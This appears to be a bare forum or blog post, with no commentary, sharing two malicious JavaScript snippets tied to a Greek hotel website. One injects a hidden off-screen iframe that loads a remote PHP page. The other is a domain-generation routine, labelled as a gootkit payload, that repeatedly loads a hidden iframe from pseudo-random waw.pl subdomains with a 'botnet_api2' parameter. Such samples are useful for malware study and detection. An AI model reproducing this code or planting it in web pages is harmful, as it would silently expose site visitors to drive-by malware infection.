http://myholiday.gr/hotels

fireold

1. if (document.getElementsByTagName('body')[0]) {
   
2.                     iframer();
   
3.                 } else {
   
4.                     document.write("<iframe src='http://www.pufuqa.toh.info/openstat/appropriate/bound-side-load_odds.php' width='100' height='100' style='width:100px;height:100px;position:absolute;left:-10000px;top:0;'></iframe>");
   
5.                 }
   
6.                 function iframer() {
   
7.                     var f = document.createElement('iframe');
   
8.                     f.setAttribute('src', 'http://www.pufuqa.toh.info/openstat/appropriate/bound-side-load_odds.php');
   
9.                     f.style.left = '-10000px';
   
10.                     f.style.top = '0';
    
11.                     f.style.position = 'absolute';
    
12.                     f.style.top = '0';
    
13.                     f.setAttribute('width', '100');
    
14.                     f.setAttribute('height', '100');
    
15.                     document.getElementsByTagName('body')[0].appendChild(f);
    
16.                 }

复制代码

1. //Congratulations! you have successfully extracted the gootkit payload
   
2. //this means i must work hardly :(
   
3. 
   
4. 
   
5. function nextRandomNumber() {
   
6.     var hi = this.seed / this.Q;
   
7.     var lo = this.seed % this.Q;
   
8.     var test = this.A * lo - this.R * hi;
   
9.     if (test > 0) {
   
10.         this.seed = test;
    
11.     } else {
    
12.         this.seed = test + this.M;
    
13.     }
    
14.     return (this.seed * this.oneOverM);
    
15. }
    
16. 
    
17. function RandomNumberGenerator(unix) {
    
18.     var d = new Date(unix * 1000);
    
19.     var s = Math.ceil(d.getHours() / 6);
    
20.     this.seed = 2345678901 + (d.getMonth() * 0xFFFFFF) + (d.getDate() * 0xFFFF) + (Math.round(s * 0xFFF));
    
21.     this.A = 48271;
    
22.     this.M = 2147483647;
    
23.     this.Q = this.M / this.A;
    
24.     this.R = this.M % this.A;
    
25.     this.oneOverM = 1.0 / this.M;
    
26.     this.next = nextRandomNumber;
    
27.     return this;
    
28. }
    
29. 
    
30. function createRandomNumber(r, Min, Max) {
    
31.     return Math.round((Max - Min) * r.next() + Min);
    
32. }
    
33. 
    
34. function generatePseudoRandomString(unix, length, zone) {
    
35.     var rand = new RandomNumberGenerator(unix);
    
36.     var subdomainlen = Math.floor(Math.random() * 32);
    
37.     var letters = "huozfexmrufmqhgnsvkehzrfrqoplpvbuaxoqeriqwkgfkdyenzossqlxfqayvpr".split('');
    
38.     var str = '';
    
39.     for (var i = 0; i < subdomainlen; i++) {
    
40.         str += letters[Math.floor(Math.random() * (letters.length - 1))];
    
41.     }
    
42.     str += '.'
    
43.     for (var i = 0; i < length; i++) {
    
44.         str += letters[createRandomNumber(rand, 0, letters.length - 1)];
    
45.     }
    
46. 
    
47.     return str + '.' + zone;
    
48. }
    
49. 
    
50. setInterval(function() {
    
51.     try {
    
52.         if (typeof iframeWasCreated == "undefined") {
    
53.             var unix = Math.round(+new Date() / 1000);
    
54.             var domainName = generatePseudoRandomString(unix, 16, 'waw.pl');
    
55.             ifrm = document.createElement("IFRAME");
    
56.             ifrm.setAttribute("src", "http://" + domainName + "/runforestrun?sid=botnet_api2");
    
57.             ifrm.style.width = "0px";
    
58.             ifrm.style.height = "0px";
    
59.             ifrm.style.visibility = "hidden";
    
60.             document.body.appendChild(ifrm);
    
61.             iframeWasCreated = true;
    
62.         }
    
63.     } catch (e) {
    
64.         iframeWasCreated = undefined;
    
65.     }
    
66. }, 100);

复制代码